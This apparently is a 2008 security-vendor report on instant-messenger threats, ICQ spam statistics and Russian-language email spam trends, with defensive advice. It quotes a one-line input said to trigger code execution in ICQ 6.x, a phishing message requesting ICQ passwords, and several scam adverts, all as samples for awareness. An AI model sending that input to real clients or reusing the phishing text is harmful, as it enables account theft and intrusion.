Returned: Email-Worm.Win32.NetSky.x, Email-Worm.Win32.NetSky.b, Net-Worm.Win32.Mytob.u, Email-Worm.Win32.NetSky.r, Net-Worm.Win32.Mytob.bi, Net-Worm.Win32.Mytob.t, Net-Worm.Win32.Mytob.cg.
No change: Email-Worm.Win32.NetSky.q, Email-Worm.Win32.Scano.bn.

Instant threats

IM clients
For many people, communicating online has become an integral part of daily life. The multitude of options for communicating with others – email, chat, forums, blogs, etc. — all occupy their own specific place on the Internet. Instant messengers (IM), which allow users to talk to others anywhere in the world in real time, are one of the popular alternatives.

In order to use IM, a user needs an Internet connection and a client application installed on their PC. There are lots of IM applications and almost all support the same basic functions, allowing a user to search for other users with similar interests, access personal profiles, choose a status mode, etc. A number of IM clients (or Internet pagers, as they are sometimes called) offer additional features.

The most popular IM client in Russia is undoubtedly ICQ – a playful abbreviation of the phrase “I seek you”. Every ICQ user has a unique number, or UIN (Unified Identification Number) that s/he uses to log on. Each UIN is protected by a password set by the user. Messages are sent via the TCP/IP transport protocol using a format specially created by the developer Mirabilis. As a rule, a single message consists of one TCP packet. Some other clients also make use of modified versions of this protocol to send messages, e.g. QIP (Quiet Internet Pager) and Miranda.

Microsoft’s MSN Messenger (or Windows Live Messenger) is another IM client popular with users in the West. MSN Messenger uses Microsoft Notification Protocol (MSNP, also known as Mobile Status Notification Protocol). The MSNP2 protocol is publically available, although other versions are not publically available. The latest version of MSN Messenger uses version MSNP14.

QQ, an IM application similar to ICQ, is very popular in China.

Figure 1. The Chinese IM client QQ

As well as standard IM functions, Skype also offers voice chat. This client, which is popular around the world, allows users to exchange voice messages for free. To do this, the user needs a headset and a computer with the application and an Internet connection. Skype can also be used to call any telephone number, although this is not a free service.

IM threats
Unfortunately, the virtual world is open to abuse and instant messaging applications are not immune. IM is often the target of the following malicious activities:

Stealing passwords to IM accounts using brute force attacks or social engineering.
Spreading malware (this can be done in two ways):
Messages are sent which contain links; if the user clicks on the link, a malicious program file is downloaded to the user’s PC. Social engineering is used to tempt the user to open the file and by doing so, launch the malicious program.
Messages are sent which contain links to infected websites.
Spam.
All IM applications are vulnerable to some type of threat. Take, for instance, the popular Chinese IM client QQ. Trojan-PSW.Win32.QQPass, and a related program, Worm.Win32.QQPass, are both widespread in China and were specially created to steal QQ client passwords. WormWin32.QQPass propagates by copying itself to removable media along with an autorun.inf file (this ensures the worm will be launched on an uninfected computer as long as the Autorun function is enabled).

Skype has also not escaped the attention of virus writers. Worm.Win32.Skipi spreads via Skype by sending a link to its executable file to all Skype contacts on the victim machine. The worm also spreads by copying itself to removable media together with a file called "autorun.inf". In addition to this, it will prevent antivirus solutions and Windows from being updated by editing the hosts file, and also attempts to terminate processes associated with security applications. And of course, the picture wouldn't be complete without a Trojan: Trojan-PSW.Win32.Skyper is designed to steal Skype account passwords.

Microsoft’s MSN Messenger is actively used to spread IRC bots. Many of them are capable of propagating via the messaging client when they receive a command from a remote user via a backdoor. For instance, if a cybercriminal has a small botnet s/he wants to extend, s/he sends a command to backdoors on the infected machines. The command instructs the machines to send a message with a link such as http://www.***.com/www.funnypics.com to all MSN Messenger contacts on those machines. After that, everything depends on the person that receives the message. If he decides to look at the “funny pics”, that means another computer will be added to the zombie network – by clicking on the link the user downloads a backdoor to his/her machine.

Malicious users exploit MSN Messenger because it is included in the Windows installation package. This means all Windows users automatically have the MSN client on their machines. The popularity of MSN around the world makes it all the more attractive to cybercriminals wanting to increase the number of infected computers in their botnets.

Figure 2. Part of Backdoor.Win32.SdBot.clg.
The underlined sections show the commands used to spread the Trojan

ICQ threats
This section provides an overview of the most common attack methods used to target IM clients, using ICQ as an example.

Password theft
As mentioned above, all ICQ users have a Unified Identification Number, or UIN. At the moment, nine-digit numbers are the most common. However, many users are keen to have a UIN that is identical to their mobile phone number, a numerical palindrome, or in which all the digits are the same. Such UINs are easy to remember and, for some, a matter of prestige. ICQ numbers with five, six or seven digits, which may contain only two different numbers, are seen as being particularly valuable.

‘Attractive’ UINs are traded, often fetching high prices. Many sites even have a number ordering service that promises to “obtain” the number wanted by the customer. Moreover, batches of unremarkable nine-digit numbers are offered to those interested in sending mass mailings. Using multiple numbers to distribute spam makes it possible to evade the anti-spam blacklists used by irritated users to ignore specific numbers.

The vendors of such ‘prestigious’ numbers rarely mention how the numbers are obtained. E-commerce sites contain assurances that the UINs are being sold legally. In most cases, however, the vendor has acquired the ICQ numbers by illegal means.

A number of methods are used to steal UINs. The multitude of Internet stores selling attractive UINs often engage in industrial-scale password searches and account theft. Another method is to steal the password to the ICQ user’s primary email and then use it to change the original UIN password without the user’s knowledge. Here's a more detailed overview of how this works.

ICQ technical support offers a service for users that have forgotten their UIN passwords. The process of restoring a password has been modified several times and has become more sophisticated. It now acts as a fairly reliable safeguard against password theft. Users are required to answer a question that they themselves set. If they have forgotten the answer, then the question can be changed using their primary email – the email address entered in the contact information during registration. The process is reasonably secure, but if a third party has somehow gained access to the primary email, the UIN is there for the taking. After obtaining the password to the primary email it is possible for a malicious user to contact ICQ pretending to be an account holder who has forgotten his or her UIN password. The malicious user can then prevent the original owner from accessing not only his or her ICQ account but also the primary email simply by changing the old password. Theft of this kind is not easy – obtaining passwords to email accounts linked to ICQ numbers requires a very powerful computer or even network.

However, the most popular method for stealing ICQ numbers is by using malicious programs, and Trojan-PSW.Win32.LdPinch in particular. It's over the last few years that this family of Trojans has come to pose a threat to users. LdPinch not only steals passwords to ICQ and other IM clients such as Miranda but also to email accounts, various FTP programs, online games etc. There are dedicated constructor programs designed to create specific types of malicious Trojans. Such programs make it possible to set parameters defining which user passwords the malware will steal once installed on the victim machine. Once the program has been configured, the malicious user only has to provide an email address where confidential information will be sent. The ease with which these malicious programs can be created means they are prevalent not only in mail traffic but also in IM traffic.

Figure 3. Constructor used to create Trojan-PSW.Win32.LdPinch

Spreading malicious programs
Mail traffic contains a range of malware families which either spread themselves, or are sent via spam. ICQ, however, is generally used to spread three types of malicious program:

IM worms – these malicious programs use the IM client to self-propagate.
Trojans designed to steal passwords, including passwords for ICQ numbers (in the vast majority of cases, it is Trojan-PSW.Win32.LdPinch).
Malicious programs classified by Kaspersky Lab as Hoax.Win32.*.* (malware created to fraudulently obtain money from users).
How exactly is ICQ used to spread malware?

IM worms require little or no user interaction to spread. When run, many IM worms send themselves to the IM contacts on the victim machine. These worms have a range of functions: they can steal passwords, create botnets and, sometimes the payload is purely destructive (e.g. deleting all .mp3 files from the victim machine). Malicious programs such as Email-Worm.Win32.Warezov and Email-Worm.Win32.Zhelatin (Storm Worm) have used ICQ to actively spread.

However, in most cases user action is required to ensure that an attack will be successful. A wide variety of social engineering ploys can be used to make a potential victim click on a link, and open a file if one is downloaded from the link.

Here's an example of an attack designed to download malware to the victim’s machine. First of all, the malicious user creates several user accounts with seductive profile information (e.g. “pretty girl, 22, looking for a man”). Bots (small programs with primitive intelligence that can support a basic conversation) are then linked to that profile number. The first thing users usually want to see is a photograph of the “pretty girl”; the bot responds to such requests by sending a link. Needless to say, the link doesn't lead to a photo, but to a malicious program.

A variation on the above is when a link to a malicious program is inserted in the personal details of the “girl”. This type of attack requires more effort than the previous method. For example, at least a few of the main personal information fields have to be filled in and potential victims have to be selected. Then a conversation has to be struck up to ensure that users are tempted to click on the link to “nice photos from the Pacific coast” in the “girl’s” personal details.

Social engineering ploys are also used when spreading malicious programs with the help of ICQ spam. More precisely, it's not the malware itself that is spread – users are sent links to malicious programs.

Links in spam can also lead to sites (legitimate ones that have been hacked, or ones which have been specially created) which contain Trojan-Downloader programs. These downloaders then install other malicious software on the victim computer. A more detailed description of such attacks is given below.

Browser vulnerabilities (in particular, those in Internet Explorer) are frequently exploited to download malware with the help of malicious code already placed on a website. First of all, a popular legitimate site will be attacked, and code (e.g., iframe or encrypted JavaScript) placed on its pages. This code will in turn download a malicious program to the computers of those who visit the site. Another technique is to create a simple site on cheap or free web hosting – a site which contains similar downloader code. The site will then be advertised using mass mailing via IM mailing. If a user clicks on a link to the site, malicious software will be secretly downloaded to the victim machine. The user may not even suspect that the site s/he visited was attacked or was a fake. Meanwhile, LdPinch or IRCBot will be busily running on the infected computer.

The vulnerabilities used in carrying out such attacks can be present in the instant messaging applications themselves. In many cases the vulnerability can lead to buffer overflow and the execution of arbitrary code on a system, or provide remote access to a computer without the user's knowledge or consent.

If the malicious code that is run on a system after a buffer overflow is able to self-propagate, then by using the same application vulnerability on other machines the program can penetrate the computers of a significant number of users, causing an epidemic. Exploiting vulnerabilities requires a high degree of technical skill, and this limits, to some extent, the options open to cybercriminals.

ICQ spam has recently been used to spread fake programs that supposedly generate pin codes for cards used to pay for various mobile phone services. Kaspersky Lab detects these programs as not-virus.Hoax.Win32.GSMgen. In actual fact, such software generates unlimited quantities of randomly generated numbers that are supposed to be pin codes for cards used to top up telephone accounts. The results generated by the program are encrypted and in order to decipher them a key has to be obtained from the author, which, of course, comes at price. The sum is usually small – about $10-$15 – which makes the offer even more attractive. The reasoning goes something like this: “I pay $15 once and then I can use my mobile phone for the rest of my life for free!” The fact that the number received in return for payment does not top up an account makes this an everyday case of fraud. (It should be noted that if the program did indeed generate pin codes to pay for mobile services, the price would be significantly higher, and the authors would keep a much lower profile so as not to attract the attention of mobile operators and law enforcement agencies.)

ICQ spam
Unlike email spam, ICQ spam has not been researched in depth. Below are the results of a small study conducted from February 23 to March 23, 2008. The research involved categorizing the subjects of unwanted messages sent to ICQ users and performing a comparative analysis of ICQ spam vs. email spam.

Popular subjects in ICQ spam

The subjects in ICQ spam messages are quite varied and can include advertisements for a new website or game server, requests to vote for somebody in a contest, offers to buy expensive mobile phones at reduced prices or messages that include URLs that lead to malicious programs. A spam link can lead to a website with an exploit that uses vulnerabilities in Internet Explorer or other popular browsers (messages with malicious links were not classified as a separate category for the purposes of this study).

Figure 4. Distribution of ICQ spam by subject

Advertising of Entertainment Sites (18.47%) came top of the rankings. In all probability, this category will continue to lead the ICQ spam statistics. The main reason for its popularity is the effectiveness of this type of spam. Take a typical situation when someone who has been working on a computer for a long period receives an ICQ message about a new website with lots of funny images/stories/videos etc. It is very likely that the tired user will follow the link in the message as a diversion from work.

The Adult Spam category in second place (17.19%) circulates messages similar to those in email spam that advertise dating sites, porn resources, individuals pages which contain erotic material etc.

The Online Income category (15.83%) includes messages that promise money in return for clicking on banners, visiting certain websites and looking at advertising. It also includes network (or multilevel) marketing offers.

The Other Spam category (12.77%) consists of messages on different subjects, each of which account for a relatively low percentage of spam traffic, making it impossible to classify them in individual categories. Some of the message authors in this category have very vivid imaginations. They send a variety of chain letters, toothpaste ads, predictions by archbishops of a fascist dictatorship in Russia, etc. Among the goods advertised, DVDs and car parts are predominant. ICQ phishing messages, which will be discussed later in this article, also fall into this category.

Messages related to ICQ in some way were included in the category in fifth position of our ranking (8.17%). One interesting phenomenon is “ICQ chain letters”, most of which contain the following text (translated from Russian):

“WARNING !!! Starting 1.12, ICQ will beCome a paid
service. You can prevent this, send this message to
20 people from your contact list. This is not a
joke (source www.icq.com) If you send it 20
times you will receive an email and your flower
will beCome blue. I.e. you will be among those
who are against. If voting wins, ICQ will
reMain free.”
The only things that change are the date and the number of people to whom the message is supposed to be sent. Interestingly, some messages contain multi-level quoting, indicating that many users really believe someday their “flower will become blue” and ICQ will remain free forever.

Messages in different languages that urge users to upgrade to the new, sixth version of the ICQ client are also sent on a regular basis. At first, it was unclear why these messages were so popular among spammers. There was unconfirmed information that ICQ 6.x includes a vulnerability that leads to errors when processing messages formed in a certain way. On February 28, 2008 this was confirmed: according to http://bugtraq.ru, “…sending a specially formed … message (in the simplest case, "%020000000s") to a user with ICQ 6.x installed results in an error when generating HTML code to display messages in the embedded Internet Explorer component. This error may lead to the execution of arbitrary code on the remote system.” This vulnerability is not present in the latest build of the ICQ client.

Messages in the Computer Games category (5.79%) can be divided into two large groups. Messages in the first group advertise various browser-based online games, those in the other – game servers, mostly for Lineage II and Counter-Strike.

Offers of Illegal Services (5.45%) are only one third of a percentage point behind computer game ads. These offer users the chance to get the password to a specific mailbox, organize a DoS attack, make counterfeit documents (both Russian and non-Russian), and learn how to hack credit cards or obtain the information necessary to do so – all for a price.

Eighth position (5.28%) went to the category containing messages that ask users to vote for specific participants in a range of Internet contests.

Job and joint business offers came ninth (4.17%) and offers of computer services, including hosting, tenth (3.22%).

The Mobile Spam message group at the end of the rankings (2.72%) also consists of two types of messages. The first type includes messages that advertise websites selling mobile phones. The prices of popular models on such sites are often significantly lower than market prices, raising suspicions as to the origin and legality of such telephones. The second type is messages that advertise sites with a variety of mobile content.

During the period from February 23 to March 23, 2008, no more than 1% of messages in ICQ spam were found to be advertising medications or health related services.

Phishing messages are also occasionally sent to ICQ users. These messages were not categorized as an individual group because they are relatively rare. Cybercriminals use social engineering methods when attempting to obtain passwords to users’ UINs. The success or failure of such attacks largely depends on how well informed a user is. If there are genuine problems, as a rule the official ICQ support service will inform users of the problems, but it will never ask them to send their passwords by email or enter it in a web form on a website.

Figure 5. Phishing message sent in an attempt to obtain an ICQ account password

Hello, this is a message from the ICQ security system. An attempt
has been made to steal your ICQ number. To prevent this in the future, it is
recommended that you send your ICQ number and password for processing to
our address administrat-icqo2008@rambler.ru. You will receive a reply
within an hour. Thank you for using our system.
Distinguishing characteristics of ICQ spam

Unlike email, ICQ makes it possible to search for people based on the interests described in their user contact information. This makes it possible for cybercriminals to target specific audiences with their spam. It is fairly easy for spammers to get relevant data (in most cases, the ages and interests of users) and use it to gain the attention of spam recipients.

Practically all spam messages come from UINs that are not on the user’s contact list. The number of unwanted messages received by a user in any given period of time depends on the UIN. Users with six-digit UINs receive an average of 15 to 20 unwanted messages every hour, many of which contain links to Trojan-PSW.Win32.LdPinch. Users with nine-digit numbers that have nothing special about them receive an average of 10 to 14 such messages every day, while users with 'attractive' numbers get 2 to 2.5 times more spam.

In terms of message subjects, ICQ spam significantly differs from email spam. While about 90% of email spam advertises various goods and services, the proportion of such advertising in ICQ spam is less than 13% (the total share of the Illegal Services, Computer Services, Mobile Spam and Medical Spam categories), with Illegal Services (5.45%) being the largest of all the categories offering services.

On the whole, entertainment-related subjects predominate in ICQ spam. The reason for this is that ICQ is rarely used for business communication, while most of its users are young people. Spammers take the interests of their target audience into account: ICQ spam is dominated by invitations to visit entertainment sites and by ‘adult’ advertisements. Spam in the Computer Games, Voting and Mobile Spam categories also targets young people. On the whole, young people are targeted by about 50% of all spam messages.

The low share of ‘medical’ spam (traditionally a leading category in email spam) is also determined by the target audience. In ICQ spam, the share of this category is below 1%. Apparently, ICQ users do not respond as required to advertising of medical goods and services.

Distinguishing characteristics of ICQ spam:

Targets a young audience.
Overall bias towards entertainment.
Virtually no advertising of consumer goods. Exceptions are offers for mobile phones and pharmaceuticals, as well as a small number of messages which fall into the category of Other Spam.
Relatively high percentage (8.17%) of messages related to ICQ itself.
Significant proportion (5.45%) of messages offering illegal services. The most popular offers are email and ICQ hacking, counterfeit documents, credit card hacking.
An attack scenario
The user launches a file downloaded using a link received via ICQ, but the photo promised by the spammer never shows up on the screen. The user waits for a minute or two, and in the meantime the Trojan searches the computer for passwords stored on it. Some of the passwords are encrypted, but they can be easily decrypted by the cybercriminal. Then the Trojan collects all the passwords found and creates an email message containing all the confidential information collected. The message is sent to the cybercriminal’s email address which was created a couple of days prior to the attack. To prevent the Windows firewall from warning the user of the danger, the Trojan disables the firewall by modifying the relevant registry key. The Trojan also takes similar action against other programs that could prevent it from stealing passwords and other important information from the user. Finally, the malicious program creates a .bat file that deletes both the Trojan and itself, thereby destroying any traces of malicious activity.

By the time a user begins to suspect that something suspicious is going on, the hacker will have processed tens or hundreds (depending on the mailing size) of messages with passwords sent by the Trojan. Incidentally, many users remain unaware that any malicious activity has taken place at all. In any case, the only evidence the user has is a link to a non-existent photo, so the chances of tracing the cybercriminal are very slim.

Users often console themselves by saying they had nothing of importance on their computers anyway. But a hacker or cybercriminal wouldn't agree: s/he now has an impressive list of passwords to email accounts, FTP clients and online games, as well as the user’s bank account and, yes, the ICQ account itself.

You could ask why the hacker might need one more nine-digit number that nobody knows. This is why: s/he will enter the password in their ICQ client and gain access to the user’s contact list. A message will then be sent to all users on the contact list asking them to lend 50 e-dollars and promising to repay the debt the next day. The rest will depend on the recipients’ generosity and their relationship with the user whose account has been stolen. Usually, it is not too difficult to persuade a hesitant user to oblige. At the same time, the hacker will be chatting to other users on the contact list, trying to persuade them to pay up as well. Even if only one person on every victim’s contact list agrees to pay the virtual money to the hacker, the latter will receive a considerable amount of money comparable to the daily wages of a good programmer or even more – all for an hour of chatting.

What about the FTP account? What will happen if the FTP server to which the cybercriminal gained access using the stolen password stores the web pages belonging to a sufficiently popular website? The cybercriminal will be able to add a simple iframe or encrypted JavaScript code at the end of each web page, which will surreptitiously download and launch a malicious program to all computers used to view the site.

All the actions described above are easy to automate. A cybercriminal can easily find ICQ UINs to send spam to on numerous dating sites and forums. More precisely, this will be done by a special program that does all the routine work, including filtering out duplicate numbers and checking the spam list for inactive numbers. Then the hacker will upload a Trojan to a website registered with a free hosting service and will send a link to the website using the spam list created by the hacker’s software. After this, another program will sort the numerous messages sent by the Trojans launched on victim computers and categorize the passwords received. The list of new ICQ numbers received from the Trojan will be converted to a new spam list. If an infected user’s ICQ number turns out to be attractive (i.e., easy to remember), it can be sold later for a large amount of money. And then the final stage – sending messages with convincing requests to lend a little money. If a reply to the request is received, it's time for the hacker to get involved and use his or her knowledge of psychology and social engineering techniques. After this, the ‘hijacked’ numbers can be sold wholesale to spammers. The process described above may sound like fiction, but in actual fact, such schemes are quite common.

To summarize, here's a list of why cybercriminals attack IM clients:

Selling stolen ICQ numbers (nine-digit numbers are sold wholesale and ‘attractive’ numbers are sold individually for significant amounts of money).
Creating spam lists for sale to spammers or for mass distribution of malicious programs.
Using the contact lists of victims as trusted sources to ‘borrow’ money.
Downloading malicious programs using software vulnerabilities.
Changing the web pages of legitimate sites (using FTP server passwords) to download malicious software to visitors’ computers.
Creating botnets or extending existing zombie networks.
Other malicious activity.
Counteracting attacks on IM systems
What can users do against such sophisticated and relentless attacks? Defend themselves, naturally! Below is advice to help readers protect themselves against threats that spread via IM clients.

First of all, be careful and do not click thoughtlessly on links in received messages. Listed below are several types of messages that users should view with extreme caution:

Messages received from unknown users with strange nicknames (such as SbawpathzsoipbuO).
Messages from users on your contact list which ask you to take a look at new photos which have an.exe file extension.
Messages that allegedly contain sensational news of an affair between two celebrities with “a report from the scene”. The ‘report’ in this case is usually a link to the following file: http://www.******.com/movie.avi.exe. It is highly likely that this link will lead to Trojan-PSW.Win32.LdPinch.
Messages suggesting that the user download a program which will provide new opportunities e.g., “NEW BUG in ICQ enabling you to create any number that does not exist”. A link in the message will no doubt lead to a program, but that program will steal the user’s UIN rather than create a new account number.
Such messages should simply be ignored.

If a message comes from a user you know, find out whether they really sent it. And of course, do not download a file with an .exe extension and launch it. Even if the file extension is not specified in the link, you could be redirected to another page that contains malicious software.

As always, users should observe the elementary rules of ‘computer hygiene’: an antivirus product with up-to-date databases and a firewall which blocks unauthorized network connections should be installed on the computer. It is a good idea for the antivirus product to include proactive protection that detects malicious programs based on their behavior and/or a heuristic analyzer.

Users are often unaware of the fact that a malicious program has been run on their computer. Friends or contacts may provide clues to the fact that the PC has been infected. One example would be a friend asking “Why did you ask me to lend you 50 WebMoney units yesterday when we chatted on ICQ?” when the real owner of the ICQ account did no such thing. Another, even more obvious, indication of an infection is a fruitless attempt to use the login or password for a service: unsuccessful authorization attempts mean that the password has been changed. By whom? Either by the official service provider or by a cybercriminal. In the first case the user will either get a new password or notice that the password has been changed sent via email or some other means. If a cybercriminal is to blame, this will not happen.

What should be done if a Trojan has delivered its malicious payload and then deleted itself from the computer? First of all, make sure the computer really is clean by scanning it with an antivirus program. Then change any passwords the Trojan may have stolen, if possible. To do this, try to remember which programs require passwords and try to enter these passwords. If your attempt is successful, change the password immediately. It also makes sense to send the relevant alert to all users on your contact list and ask them not to respond to requests sent from your IM account asking to borrow money, and not to attempt to view photos by following links sent in an IM message.

Installing the latest version of ICQ downloaded from the official ICQ website can help to prevent execution of arbitrary code on the system that is made possible by an ICQ 6.x vulnerability related to processing HTML code.

You can take the following steps to protect yourself from ICQ spam.

Since spammers can check a user’s ICQ status using a website, it makes sense to block this feature in your ICQ client. Spam mailings usually target users who actively chat on ICQ or at least are always online. Therefore, it’s best to remain in invisible mode whenever possible. However, some programs can tell other users whether you are actually offline or just invisible. In this situation, you can use an anti-spam bot – a simple module supported by some IM clients (such as QIP). The screenshot below shows the configuration of a simple anti-spam bot.

Figure 6. Configuration of a simple anti-spam bot

How does an anti-spam bot work? If a user who is not in your contact list wants to chat to you, they will have to answer a question before they can start chatting. They will not be able to send you any messages until the question is answered. It is a good idea to use questions that everyone knows the answers to, such as “how much is 2+2*2?” or “what is the name of our planet?” If the user writes “6” or “Earth” respectively and sends the message, they will then be allowed to send you further messages. This protection is relatively successful at blocking a range of bots that send spam, although some of these bots may be intelligent enough to answer the most popular questions, e.g., the default questions used in protection modules.

Conclusion
Instant messaging programs are very attractive to malicious users of all kinds, and because of this the problem of malware distribution via IM clients is serious. New versions of IM clients contain as yet unknown vulnerabilities, which can be identified first by hackers and only afterwards by program developers. Such situations can easily lead to mass epidemics. Some users are also extremely tired of getting unwanted messages (IM spam).

Currently, there are no methods or solutions designed specifically to protect IM clients. However, observing the simple rules of ‘computer hygiene’, and using a well-configured anti-spam bot combined with a healthy dose of common sense can help users enjoy worry-free chat via the Internet.

Evolution of spam

Spam in mail traffic
Spam in mail traffic averaged 86.2% in April 2008. A low of 68.6% was recorded on 28 April, while a high of 93.9% occurred on 9 April. The share of graphical spam declined considerably in April compared to March and was only 13%.

Spam by category
In April the top five leading spam categories remained unchanged from the previous month:

Medications, health-related goods and services (16.4%)
Education (15.6%)
Fake designer watches (11.6%)
Travel and tourism (9.8%)
Computers and the Internet (4.3%)

The Medications, health-related goods and services category maintained its leading position. The lion’s share of spam in this category is English-language adverts for viagra, which is so popular because no prescription is required to buy it (viagra is classified as a prescription drug in a number of countries). In Russia, however, viagra is freely available at any drug store, so Russian-language adverts for it are rare.

An interesting new trend in April, therefore, was the appearance of Russian-language spam advertising viagra. The text of the message was translated from an English-language version. The site mentioned in the advertisement by the spammers included the caveat “Generic viagra for sale here”, which continued: “exact copy of the world’s most famous medication for male erectile dysfunction”. The fact that Russian consumers are only really attracted by low prices meant the mailing was short-lived.

П.робл.е.ма. п.овышения потенци.и вст.ала в посл.еднее время особен.но остро не то..лько д.ля му.жчин .ста.рше 60-ти лет, но и д.ля 40 и 3.0-ле.тних му.жчин. По данн.ым Всемирной Организации Здравоохранения каждый десятый му.жчина ст.арше 2.1 года с.тра.дает по.ниже.нной по.тенцией, а каждый третий мужчина с.тарше 60 лет не спо.собе.н на половой акт. По.ниженн.ую п.от.енцию. можно. лечи.ть! В этом в.ам поможет всемирно и.звес.тн.ый п.репарат Виагр.а .В отли.чие от других с.по.собов .леч.ен.ия. эрек.тил.ьной .дис.функц.ии,. котор.ые .пре..ду.см.атривают .проведение уко.лов в .пол.ов.ой чл.ен или другие медицинские про.цед..уры, Виа.г.ра является прост.ым, удобным. и лег.ко .прим.еняемым пр.епар.атом. При. ис.пользовании "Виагры." Вы .просто принимает.е одну таблетку тогда, к.огда план..ируете сексуальны.й контакт Пре.им.ущ.ества .В.иагры - Эффективна у 91.% .мужчин, в отличи.е о.т а.нало.гов, та.ких как Сеалекс,. Им.паза, Вука..-Ву.ка - Де.йствует в .теч.ении. 6 часов после пр.иема - Действует на естественные ме.хани.змы возникновения э.рек.ции - Применяется у м.уж.чин, страдающи.х эректильной дисфу.нкцией ра.зли.чно.го п.роисхожде.ния (сосудистые, не.рвн.ые р.асст.ройс.тва эре.кции) - Пр.ин.имает.ся н.епос.редстве.нно пере.д половым ак.том - Практически не. им.еет п.обочн.ых эффект.ов Приобрести этот пр.епарат .можно зд.есь
A Russian-language advert for viagra. The body of the text is interspersed with full stops that break up the individual words.

As the school year draws to an end, spammers actively exploited the theme of school leaving exams and higher education entry exams, keeping the Education category in second place. Another popular theme was the option of avoiding entry exams altogether.

У Вас осталось полтора месяца чтобы поступить на дистанционное обучение БЕЗ ЕГЭ!

According to Russian legislation, the results of school-leaving exams are only valid for a year. Entering a higher educational institution after that period means the exams have to be passed once again. The advert above offers a way of avoiding repeat exams: a certificate with the required pass results can be obtained by simply signing up for a distance-learning course and paying a “fee”. Those interested in the offer are told to hurry and apply before June 10, 2008, and also to tell their friends.

Spam messages offering fake designer goods remained in third place. The sale of replica goods also took on an unexpected “political” slant. In the run up to the inauguration of Russia’s new president, spam messages started offering “A watch like Putin’s”. A cheap copy of the outgoing president’s chronometer was not the only thing on offer: lots of other goods of a similar “quality” were also available.

Часы как у Путина Легендарные часы Раtek Рhilippе В.В.Путина!!! Всего за 325 евро (реплика)! Ты хочешь походить на Президента, но не переплачивать 50000 евро?
Это возможно, причем реплики не уступают оригиналам ни по качеству ни по внешнему виду. Сравните сами:
Часы Patek Philippe Perpetual Calendar (часы В.В.Путина)
Страна производитель: оригинал - Швейцария, реплика - Бельгия
Стоимость: оригинал - 53000 евро, реплика - 325 евро.
Механизм: оригинал - Швейцария, реплика - Швейцария.
Срок службы: оригинал - 10 лет, реплика - 6 лет.
Гарантия: оригинал - 24 месяца, реплика - 18 месяцев
. Удобство покупки: оригинал - 2 бутика в России, в Москве. Реплика - бесплатная доставка в любой город России (страны СНГ).
Внешнее сходство: реплика на 100% идентична оригиналу!
Ознакомьтесь {LINK}
тел. 8-800-2000-720 (звонок из России - бесплатный)
Кроме того в Интернет магазине {LINK} в продаже ещё более 189 часов
престижнейших мировых марок:
Rado (от 299 евро), Rolex (от 325 евро), Omega (от 242 евро), Vacheron Constantin (до 1749 евро), Breguet (от 449 евро), Cartier (от 229 евро)!
юмфм фдтхю вг фла ц аа дбцяа щгд
эвх дажжд гюбч тцмяг
ыу црфщи жеюпу г шж б рояшь ц
ияфп зш э новкп
сюшшо м бшв р угещь
ьвл тгжну зштив хвцвл
у лош дфвыя прв илл
Translation:

A watch like Putin’s The legendary Patek Philippe watch of V.V. Putin!!! For just 325 euros (replica)! You want to look like the President, but don’t want to pay 50000 euros?
Now it’s possible, and the replica is no different from the original in terms of both quality and looks. Compare for yourself:
Patek Philippe Perpetual Calendar watch (the watch of V.V. Putin)
Made in: original – Switzerland, replica - Belgium
Cost: original – 53000 euros, replica – 325 euros.
Mechanism: original – Switzerland, replica – Switzerland.
Service life: original – 10 years, replica – 6 years.
Guarantee: original – 24 months, replica – 18 months.
Convenient purchase: original – 2 boutiques in Moscow, Russia. Replica – free delivery to any town in Russia (CIS).
External appearance: replica is 100% identical to the original!
See here {LINK}
Tel. 8-800-2000-720 (free calls from Russia).
There are also more than 189 watches of famous international brands at the Internet store {LINK}
Rado (from 299 euros), Rolex (from 325 euros), Omega (from 242 euros), Vacheron Constantin (up to 1749 euros), Breguet (from 449 euros), Cartier (from 229 euros)!
юмфм фдтхю вг фла ц аа дбцяа щгд
эвх дажжд гюбч тцмяг
ыу црфщи жеюпу г шж б рояшь ц
ияфп зш э новкп
сюшшо м бшв р угещь
ьвл тгжну зштив хвцвл
у лош дфвыя прв илл

SMS fraud
More and more spam with offers to pay for goods and services via SMS messages sent to short numbers is appearing on the Russian Internet. Even if the spam message states that the SMS is free of charge, it doesn’t mean it actually is. There is also no guarantee that the user will get what he wanted and that his money won’t just end up lining the pocket of a cybercriminal.

Spammers continue to use Mail.ru logos to make their messages look more respectable. The message below deliberately promotes a dating service because it entails further communication and new contacts. These types of messages usually include an attractive photo, and only mention further down the page that you have to pay to communicate. The very fact that the service is not free should arouse suspicion.

Вам оставлено сообщение на мобильном портале Mail.ru, пользователем <Виктория SexyGirl>
Для прочтения сообщения, отправьте смс со словом tt456734 на номер 4449
Услуга доступна для жителей РФ и граждан СНГ, стоимость услуги 0.3$ + НДС)
Сообщение отправлено 26.04.2008
Спасибо за то, что Вы являетесь пользователем Mail.Ru.
С уважением, администрация Mail.Ru (1518450363)

Translation:

Znakomstva@mail.ru

You have got a message on mail.ru from

To read the message send an SMS with the text tt456734 to 4449 (the service is available in the Russian Federation and CIS, the charge is $0.3 including VAT)

The message was sent on April 26, 2008

Thank you for using mail.ru

Administration of mail.ru (1518450363)

Today, even the financial pyramid schemes that used to offer the opportunity of huge online earnings only send out information after receiving an SMS message. For the cost of an outgoing message (5 rubles, or about 20 cents) the user contributes to a business named MLM. It goes without saying that a spammer who promises the recipient “earnings” with no initial investment can hardly be trusted.

посмотри не пожалеешь

Отправьте на номер 7030 SMS следующего содержания: код+25558 Стоимость отправки сообщения в рублях: 5 В ответ вы получите ссылку на сайт с заработком,без вложений, и практически без вашего участия.

Translation:

This is worth seeing

Send an SMS message to 7030 with the code +25558. An SMS message costs 5 rubles. In return you will get a link to the site containing information on how to get money without any investments and with minimal participation. End of translation.

Solutions from spammers: protecting against viruses and spam
On the eve of the 30th anniversary marking the first spam message sent via email, users were being offered equipment not only for sending spam but also to protect against it.

Sympathetic-sounding mass mailings with the theme “Tired of spam? Call us!!!” promoted nothing other than anti-spam and antivirus products from the German company Avira. It is unclear whether this was just another case of black PR, or the Russian representatives of Avira using unorthodox methods to advertise the services of Avira’s dealers in Russia.

In April, Russian-language spam promoting anti-virus products added to the usual English-language advertisements for very cheap software. The main difference was that the Russian-language spam was offering the programs for free.

Users should be particularly careful when downloading “antivirus” files from unknown sources, because they may turn out to be malicious programs.

Kaspersky Key 5 6 7 Ключ Касперский 5 6 7

Ключ Касперский 5 до 9_03_2010 бесплатно

Ключ Касперский 6 до 11_03_2010 бесплатно

Ключ Касперский 7 бесплатно

специально для ХХХХХХХХХХХХХХ

на {site}

Kaspersky 5 Key do 9_03_2010 Besplatno

